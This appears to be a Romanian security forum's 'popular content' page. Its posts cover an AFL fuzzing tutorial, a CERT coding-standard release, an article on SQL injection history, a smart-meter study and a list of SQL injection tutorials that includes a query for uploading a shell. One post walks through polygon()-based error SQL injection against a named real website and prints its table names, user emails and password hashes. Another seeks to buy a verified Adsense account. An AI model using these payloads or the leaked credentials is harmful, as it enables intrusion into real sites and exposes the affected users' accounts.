Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 03/24/17 in all areas

  1. Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. - In timpul acestui tutorial mi-am dat seama ca mai am nevoie de pachetele po4a, libtool, texi2html. sudo apt install po4a libtool texi2html Folosesc American Fuzzy Lop (afl). - http://lcamtuf.coredump.cx/afl/' $ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz $ tar xf afl-latest.tgz $ cd afl-2.39b/ $ make $ sudo make install Ca să vedeți dacă s-a intalat cu succes puteți verifica tastând afl-gcc $ afl-gcc afl-cc 2.39b by <lcamtuf@google.com> This is a helper application for afl-fuzz. It serves as a drop-in replacement for gcc or clang, letting you recompile third-party code with the required runtime instrumentation. A common use pattern would be one of the following: CC=/usr/local/bin/afl-gcc ./configure CXX=/usr/local/bin/afl-g++ ./configure You can specify custom next-stage toolchain via AFL_CC, AFL_CXX, and AFL_AS. Setting AFL_HARDEN enables hardening optimizations in the compiled code. În principiu acest program se așteaptă ca ținta testată să citească fișiere. Să zicem că vrem să testăm utilitarul "wc" (utilitar care numără linii în linux). man wc .. derulăm până jos cu SHIFT-G .. [..] GNU coreutils 8.25 Bun am aflat că wc face parte din pachetul coreutils. Hai să luam sursa de coreutils și să o compilăm Din moment ce folosesc ubuntu server o caut direct pe repo-urile canonical. O găsesc aici $ wget http://archive.ubuntu.com/ubuntu/pool/main/c/coreutils/coreutils_8.25.orig.tar.xz $ tar xf coreutils_8.25.orig.tar.xz $ cd coreutils-8.25/ $ CC=afl-gcc ./configure $ make Bun. Acum am compilat utilitarul pe care vrem sa il testam cu afl-gcc. Hai să verificăm dacă chiar au fost adăugate simbolurile fuzzerului. $ cd src/ $ strings ./wc | grep -i afl [..] __afl_fork_pid .AFL_VARS __afl_global_area_ptr Totul e în regulă deci. Hai să verificăm că programul nostru chiar merge. $ ./wc /etc/passwd 33 48 1740 /etc/passwd Fuzzerul are nevoie de două foldere. Unul pentru input altrul pentru output. $ mkdir in/ $ mkdir out/ $ echo "test" > in/input $ echo "test2" >> in/input # testam $ ./wc in/input 2 2 11 in/input Acum hai să pornim o rulare. $ afl-fuzz -i in/ -o out/ ./wc @@ american fuzzy lop 2.39b (wc) lq process timing qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqwq overall results qqqqqk x run time : 0 days, 0 hrs, 0 min, 5 sec x cycles done : 0 x x last new path : 0 days, 0 hrs, 0 min, 2 sec x total paths : 58 x x last uniq crash : none seen yet x uniq crashes : 0 x x last uniq hang : none seen yet x uniq hangs : 0 x tq cycle progress qqqqqqqqqqqqqqqqqqqqwq map coverage qvqqqqqqqqqqqqqqqqqqqqqqqu x now processing : 0 (0.00%) x map density : 0.23% / 0.25% x x paths timed out : 0 (0.00%) x count coverage : 1.92 bits/tuple x tq stage progress qqqqqqqqqqqqqqqqqqqqnq findings in depth qqqqqqqqqqqqqqqqqqqqu x now trying : havoc x favored paths : 1 (1.72%) x x stage execs : 21.6k/32.8k (65.87%) x new edges on : 8 (13.79%) x x total execs : 23.7k x total crashes : 0 (0 unique) x x exec speed : 3591/sec x total hangs : 0 (0 unique) x tq fuzzing strategy yields qqqqqqqqqqqvqqqqqqqqqqqqqqqwq path geometry qqqqqqqqu x bit flips : 8/88, 1/87, 1/85 x levels : 2 x x byte flips : 0/11, 1/10, 4/8 x pending : 58 x x arithmetics : 1/616, 0/75, 0/0 x pend fav : 1 x x known ints : 0/62, 3/280, 3/352 x own finds : 57 x x dictionary : 0/0, 0/0, 0/0 x imported : n/a x x havoc : 0/0, 0/0 x stability : 100.00% x x trim : 0.00%/2, 0.00% tqqqqqqqqqqqqqqqqqqqqqqqqj ^Cqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqj [cpu000: 44%] O să găsiți inputurile care crapă programul în ./out/crashes și cele care îl blochează în ./out/hangs. Have fun
    4 points
  2. Cumpar cont Adsense, cu pin verificat si de preferat cu ceva vechime. Astept pm, oferte, etc.
    1 point
  3. Pittsburgh, Pa., March 22, 2017—The Software Engineering Institute (SEI) has released the 2016 edition of the SEI CERT C++ Coding Standard. The standard provides rules for secure coding in the C++ programming language to help developers create safe, reliable, and secure systems free from undefined program behaviors and exploitable vulnerabilities. This C++ Coding Standard joins the SEI CERT C Coding Standard that was released in 2016. Both of these standards have been made available as free downloads in response to user demand, providing a wealth of expert knowledge and best practices for developing secure software systems in C and C++. The 2016 edition of the SEI CERT C++ Coding Standard reflects a decade of research and includes 83 new rules that take into account features of the C++ language that are not part of the C language. The majority of the SEI CERT C Coding Standard also provides guidance that is important for developing secure C++ programs, and they should both be used by C++ development programs. “This newly released C++ standard adds to our previously released C standard secure coding guidance for features that are unique to the C++ language. For example, this standard has guidance for object oriented programming and containers,” said Robert Schiela, technical manager, Secure Coding, for the SEI’s CERT Division. “It also contains guidance for features that were added to C++14, like lambda objects.” Mark Sherman, technical director, Cybersecurity Foundations, for the SEI’s CERT Division, added, “The SEI CERT C++ Coding Standard joins our other free guidelines for secure software development, making secure development best practices easily accessible to everyone. This new format can be widely shared for use in classes, tools, professional guides, internal development standards, acquisition and procurement specifications, and other environments.” To download the SEI CERT C++ Coding Standard, visit http://www.cert.org/secure-coding/products-services/secure-coding-cpp-download-2016.cfm. To download the SEI CERT C Coding Standard, visit http://www.cert.org/secure-coding/products-services/secure-coding-download.cfm. About the Software Engineering Institute The Software Engineering Institute (SEI) is a federally funded research and development center sponsored by the U.S. Department of Defense and operated by Carnegie Mellon University. The SEI works with organizations to make measurable improvements in their software engineering capabilities by providing technical leadership to advance the practice of software engineering. For more information, visit the SEI website at http://www.sei.cmu.edu. The CERT Division of the SEI is the world’s leading trusted authority dedicated to improving the security and resilience of computer systems and networks and a national asset in the field of cybersecurity. For more information, visit http://www.cert.org. Sursa. Daca nu vreti sa va introduceti datele pentru a putea descarca fisierul aveti aici link-ul.
    1 point
  4. Eu am elitebook 8460p și sunt foarte mulțumit de el. Il recomand, mai ales că are și ecran de 14. Cel de sus are de 12, cred că e prea mic.
    1 point
  5. [Complete Sql-Injection Course by Spirit] Hello guys my name is Spirited wolf and here are all my tutorial on most Common type of Sql Injection. You can say A complete Course for every Noob o, Here we go For testing purpose we need to setup some Sqli Labs for testing How things really work. Setup pentesting lab's in kali linux-Tutorial 1 Addon's For Firefox that we need by Spirit-Tutorial 2 Basic's Sql injection from finding column's to dumping database-Part 1-Turorial 3 Explanation for dumping tables and columns-Part 2-Turorial 3 Error Based String With Twist By Spirit-Turorial 4 How to use SqlMap for injecting site by Spirit-Tutorial 5 How to setup Pentesting lab's and SqlMap in Windows Os By spirit-Tutorial 6 Double Quote Based injection tutorial by Spirit-Tutorial 7 Blind Based Injection Basic command's that you should know By spirit-Tutorial 8(Part-1) Blind Based sql injection Tutorial by Spirit-tutorial 9(Part-2) How to Dump database with Blind Sql injection (Manually+SqlMap) method by Spirit-Tutorial 9(Part 3) Introduction To Post Based Sql Injection By Spirit-Tutorial 10 Post Based ::Double Quote Injection (Tricky) by Spirit-Tutorial 11 Important Command's for {Post And Get} based Double Query Injection by Spirit-Tutorial 12 [GET]How to Inject Site if Commas are bloacked By Spirit-Tutorial 13 Cookie Based Sql Injection full explanation by Spirit-Tutorial 14 How to make a simple DIOS by Spirit-Tutorial 15 Base64 String Based Injection by Spirit-Tutorial 16 Inject WebApplication When [OR && ANDFiltered By The web developers by spirit-tutorial 17 Second order injection explanation by Spirit-Tutorial 18 Inject Web Applications when blankspaces are blacklisted by developer-By Spirit-Tutorail 19 Uploading shell with sqli command-By Spirit /* For shelling via sqli query you first have to check if root priv. is On/Off if On then you can upload it Just type this in vulnerable column to check..{ (SELECT+GROUP_CONCAT(user,0x202d3e20,file_priv,0x3c62723e)+FROM+mysql.user) } */ And Please! Please subscribe to my channel and please share if you like So, I hope you Like all my these Amazing Tutorial if you like then please Like My tutorial,Subscribe, comment and let me know my mistake if you found any. Please comment if i done anything wrong ------------------------------------------------------------------------------------------------------------ This tutorial is for educational purpose only. I'll not responsible for any harm. ------------------------------------------------------------------------------------------------------------ Use your skills to protect other not to harm kiki emoticon Thanks for watching guys and keep watching pentesting with spirit Our youtube Channel link:: https://www.youtube.com/c/Pentestingwithspirit Facebook page link:: http://facebook.com/Pentest.with.spirit1 Twitter account:: @spirit3113
    1 point
  6. WRITTEN BY JOSEPH COX November 20, 2015 // 08:00 AM EST One of the hackers suspected of being behind the TalkTalk breach, which led to the personal details of at least 150,000 people being stolen, used a vulnerabilitydiscovered two years before he was even born. That method of attack was SQL injection (SQLi), where hackers typically enter malicious commands into forms on a website to make it churn out juicy bits of data. It's been used to steal the personal details of World Health Organization employees,grab data from the Wall Street Journal, and hit the sites of US federal agencies. “It’s the most easy way to hack,” the pseudonymous hacker w0rm, who was responsible for the Wall Street Journal hack, told Motherboard. The attack took only a “few hours.” But, for all its simplicity, as well as its effectiveness at siphoning the digital innards of corporations and governments alike, SQLi is relatively easy to defend against. So why, in 2015, is SQLi still leading to some of the biggest breaches around? SQLi was possibly first documented by Jeff Forristal in the hacker zine Phrack. Back then, Forristal went by the handle rain.forest.puppy, but he's now CTO of mobile security at cybersecurity vendor Bluebox security. “According to Microsoft, what you're about to read is not a problem, so don't worry about doing anything to stop it.” SQL, or Structured Query Language, is a programming language used to manage databases. In essence, it's used when a website needs to call up a piece of information from its database, either to process it or present it to a user. But Forristal had found that typing certain commands would force a server to reveal information stored on it. “People can possibly piggyback SQL commands,” he wrote. In the December 1998 issue of Phrack, Forristal wrote about a series of issues with a version of Microsoft SQL server. When Forristal's fellow researcher told Microsoft of the problems, “their answer was, well, hilarious,” he wrote. “According to them, what you're about to read is not a problem, so don't worry about doing anything to stop it.” Today, over 15 years after it was first publicly disclosed, SQLi repeatedly sits at thenumber one spot of vulnerabilities in the OWASP Top 10 report, which is released every three years by the Open Web Application Security Project (OWASP) Foundation,a non-profit that monitors the threats that websites face. Phrack's current logo. Image: Phrack “SQL injection is always the number one risk. That is a reflection of just how many incidents are out there, as well as other factors that keep it very high up there,” Troy Hunt, founder of breach site haveibeenpwned.com, told Motherboard in a phone interview. “When you go to a webpage, and you make a request, that parses part of the data in the request back to a server,” Hunt said. “For example, you read a news article, and the news article, in the address bar it has, “id=1”, and that gives you news article number 1, and then you get another one with ID 2.” But, “with a SQLi attack, an attacker changes that ID in the address bar to something that forces the database to do something it's not meant to do,” Hunt said, such as returning a piece of private data. An individual attack might just return one piece or section of info, so an attacker is likely to “repeat it it over and over and over again, as many times as is necessary, so they get every piece of data from the database,” Hunt said. Naturally, that's going to be quite time consuming. So, a hacker might use tools that automate the process instead. Those include Havij, which “is popular amongst script kiddies as it's for Windows and has a [graphical user interface],” Mustafa Al-Bassam, asecurity researcher and former LulzSec hacker, told Motherboard in an online chat. Another commonly used piece of software is sqlmap. “It crawls the pages on the website, similar to how a search engine crawler might, looks for input forms on the website, and submits the forms with inputs that might cause a MySQL syntax error,” Al-Bassam added. When the attacker is looking for a target to hit in the first place, that's just as simple to automate too. Image: sqlmap “They would use Google to search for URLs that are known to be typically associated with scripts that are vulnerable to SQL injection,” Al-Bassam said. “They would typically have a script that goes through all the URLs and tests them automatically to see if they're vulnerable.” “You could teach a 4-year-old to do it,” Al-Bassam added, summing up how incredibly easy the whole process is. Indeed, Hunt has uploaded a video of him teaching his 3-year-old son how to carry out an SQLi attack with Havij. “You put the URL in, here's all the data out,” Hunt told Motherboard. There are also ample on how to carry out an SQLi attack.The thing is, there are solutions ready to be deployed by website developers to stop SQLi attacks and the unnecessary leaking of customers data or corporate details. And those solutions have been around for years. One of those is the adoption of "prepared statements": when SQL commands controlling the database can’t be directly dictated by a user’s input. If the solutions are fairly straight forward, why are SQLi-based attacks still happening? “The benefit of prepared statements is that they set the semantics of a query so that any incoming data can’t surprise the developer by including syntax that changes a query intended to retrieve a single row into a query that extracts data from arbitrary tables,” Mike Shema, senior manager, software development engineer from Yahoo!, told Motherboard in an email. Another is to “use SQL libraries that take care of input sanitization for them,” Al-Bassam suggested. This, in short, scrubs any data entered by the user to remove any potential malicious parts of it. So, if SQLi is so easy that literally a child could do it, and the solutions are fairly straight forward, why are SQLi-based attacks still happening? “Any serious programmer should know about SQLi, but there's a massive shortage of programmers, so companies hire anyone even if they don't have the right training or experience to mitigate basic vulnerabilities,” Al-Bassam suggested. On top of this, “they're often put under pressure by their managers to develop functional software rather than secure software.” Shema from Yahoo! echoed this, and said that “Sometimes small apps with a narrow feature set just need to be written quickly,” meaning that the developers might bypass some of the mitigations for each attacks, despite them being relatively straight forward to implement. Hunt was slightly less forgiving, and didn't agree that it was because of pressure from higher management. Instead, he lamented about the large number of tutorials available to web developers online that, instead of providing decent advice, detail how to make systems that are vulnerable to SQLi. "I've seen multiple tutorials come up this year that have got blatant SQL injection risks in them,” he said. So just as script kiddies continue to share their SQLi on YouTube, there is parallel information sharing going on with website developers. “We've got this ability for anyone to stand up, and share their knowledge, and not always get it right,” Hunt said.Ultimately, the responsibility of the security of these sites, and the data they contain, boils down to web developers themselves. That means SQLi and the breaches it causes will remain, at least for a little while longer. Sursa: http://motherboard.vice.com/read/the-history-of-sql-injection-the-hack-that-will-never-go-away
    1 point
  7. ###### Info ###### Title : Beyond SQLi: Obfuscate and Bypass Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan" Team : CWH Underground [http://www.exploit-db.com/author/?a=1275] Date : 2011-10-06 ########## Contents ########## [0x00] - Introduction [0x01] - Filter Evasion (Mysql) [0x01a] - Bypass Functions and Keywords Filtering [0x01b] - Bypass Regular Expression Filtering [0x02] - Normally Bypassing Techniques [0x03] - Advanced Bypassing Techniques [0x03a] - HTTP Parameter Pollution: Split and Join [0x03b] - HTTP Parameter Contamination [0x04] - How to protect your website [0x05] - Conclusion [0x06] - References [0x07] - Greetz To #Link: https://www.exploit-db.com/papers/17934/ @Nytro, Aveti un bug pe campul tags, se completeaza automat cu mai mult de 5 taguri si nu te lasa sa postezi sau sa dai preview. E aiurea daca vrei sa formatezi un articol/tutorial.
    1 point
  8. This method based on the function polygon(). In a nutshell, this function constructs geometry collection. The vuln thing about it, that it can only work with the function point(). For example: SELECT polygon(point(53,12)); And the output is a bunch of ???'s. Not really exciting, ah ? For those who know a bit geometry, it goes like point(x,y). Now look whats happend when we dont use point(). SELECT polygon(53,12); Error 1367 (22007): Illegal non geometric '53' value found during parsing We get an error on our x argument, 53. So lets think a bit. If the error returns our string input as an string output, what would happend if we try to run a query ? SELECT polygon((select*from(select*from(select@@version)f)x)); Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing Boom ! 5.5.38-35.2 Now lets try that on a real site. Conditions: mysql_error on. Lets get the version: http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x)) 5.1.73-log Nice, but can we extract more ? Hell yeah. We will be using this to get tables: http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) blocklist,log_login,pernodmajorwinners,pernodmanagement,pernodmatches,pernodmess?ages,pernodnews,pernodpolls,pernodtopics,pernoduser Im interested in the table pernoduser, lets get columns: http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x)) pernodid,nickname,fullname,forumname,password,email,handicap,p_dbl,p_sgl,login,forumnotify,deleted And dump the table: http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x)) and.rogers@tiscali.co.uk:22fdf94cc29e7aff8ece472ed119c53e,butters65@hotmail.co.u?k:795b087b2ceb3482dc9956eb8f126ea3 And we get the data. To overpower the 'cut results', we can just add a condition in the end, " where email>last-email ". Hope you learned something ! Sursa: HF + Frostyhacks
    1 point
  9. Lab tests carried out by Dutch scientists have shown that some of today's "smart" electrical meters may give out false readings that in some cases can be 582% higher than actual energy consumption. The study involved several tests conducted on nine different brands of "smart" meters, also referred to in the industry as "static energy meters." Researchers also used one electromechanical meter for reference. Using a simple test rig, portrayed above, researchers connected the smart meters to various power-consuming appliances found in regular homes, such as energy saving light bulbs, heaters, LED bulbs, and dimmers. Tests lasted for six months Experiments went on for six months, with individual tests lasting at least one week, and sometimes several weeks. Researchers tried to reproduce regular household energy consumption patterns and didn't focus on putting the smart meters to stressful conditions. The study was conducted by researchers from the University of Twente and the Amsterdam University of Applied Sciences. As such, the meters were chosen to represent the installed base of energy meters in the Netherlands. Meters used in the tests were manufactured between 2004 and 2014. Test results varied wildly, with some meters reporting errors way above their disclosed range, going from -32% to +582%. Tests with uncommon results were repeated several times and the results were within a few percents of the original. Test results matched user complaints The results of their study matched numbers posted on an online forum by a disgruntled Dutchman complaining about high energy bills. Overall, five of the nine smart meters gave out readings much higher than the actual amount of power consumed, while two gave lower readings. The greatest inaccuracies were seen when researchers combined dimmers with energy saving light bulbs and LED bulbs. After finishing their lab experiment, researchers dismantled the smart meters to understand the problem. Following their efforts, the three-man research team discovered that smart meters which gave abnormally high readings used a Rogowski Coil in their setup, while the smart meters that gave out low readings used Hall effect-based sensors. Problems blamed on smart meter designs Researchers blamed all the issues on the design of some smart meters, and, ironically, electrical devices with energy-saving features. The latter devices, researchers say, introduced a large amount of noise in electrical current waveforms, which disrupt the smart meter sensors tasked with recording power consumption. "The reason for faulty readings appears to be the current sensor, and the associated circuitry," said researchers. "The experimental results [...] show that static energy meters can be pushed into faulty reading (positive and negative) if sufficiently fast pulsed currents are drawn by the consumer." Up to 750,000 faulty smart meters in the Netherlands alone Since the research only covered smart meters commonly installed in Dutch homes, researchers say that around 750,000 smart meters deployed around the Netherlands may be giving out false readings. Worldwide, the numbers of possibly faulty smart meters could be in the millions, especially after some governments, especially in the EU, have pushed for smart meters to replace classic electromechanical (rotating disk) meters. The true impact cannot be assessed, as researchers did not publish the names, makes, and models of the tested smart meters. The research team's work, titled "Static Energy Meter Errors Caused by Conducted Electromagnetic Interference," has been published in the IEEE Electromagnetic Compatibility Magazine. Sursa: https://www.bleepingcomputer.com/news/hardware/millions-of-smart-meters-may-over-inflate-readings-by-up-to-600-percent/
    -1 points
  10. Fixed Software The vendor has released updated software at the following link: jQuery UI v1.12.1 Updatează UI şi lasă prostiile
    -1 points
×
×
  • Create New...